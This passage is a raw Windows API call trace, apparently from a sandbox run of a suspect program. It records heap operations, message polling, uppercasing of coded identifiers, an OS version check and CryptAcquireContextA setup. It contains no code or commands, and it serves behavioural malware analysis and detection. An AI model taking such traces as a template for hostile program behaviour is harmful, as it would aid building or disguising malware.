ftCreationTime.dwHighDateTime=0x1d5d2e3, ftLastAccessTime.dwLowDateTime=0x21fb5f0, ftLastAccessTime.dwHighDateTime=0x1d5d7b6, ftLastWriteTime.dwLowDateTime=0x21fb5f0, ftLastWriteTime.dwHighDateTime=0x1d5d7b6, nFileSizeHigh=0x0, nFileSizeLow=0x15e09, dwReserved0=0x0, dwReserved1=0x0, cFileName="H4_H0S0fmbzOF.png", cAlternateFileName="H4_H0S~1.PNG")) returned 0x9e1eb8 [0210.252] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0210.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0210.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0210.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.253] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0210.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.253] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.254] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0210.254] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.254] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.254] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.254] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.254] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0210.255] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.255] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.255] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0210.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0210.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0210.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.256] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.256] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.256] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0210.256] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.256] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0210.256] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.256] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.256] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.256] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.256] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.256] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.256] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0210.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0210.256] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.257] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.257] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.257] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.257] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.257] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0210.257] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f00, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0210.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0210.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7140, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0210.257] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c440) returned 1 [0210.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.258] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0210.258] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.258] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0210.258] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.258] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.258] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.258] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.258] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.258] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.258] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.258] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.259] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.259] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.259] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.259] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.259] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0210.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.259] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0210.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.259] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.259] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.259] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.259] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.259] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.259] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.259] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.260] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.260] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.260] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.260] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.260] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.260] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.260] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.260] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.260] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.260] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.260] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.260] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.261] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.261] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.261] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.262] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.262] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.262] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.262] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.263] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.263] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.263] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 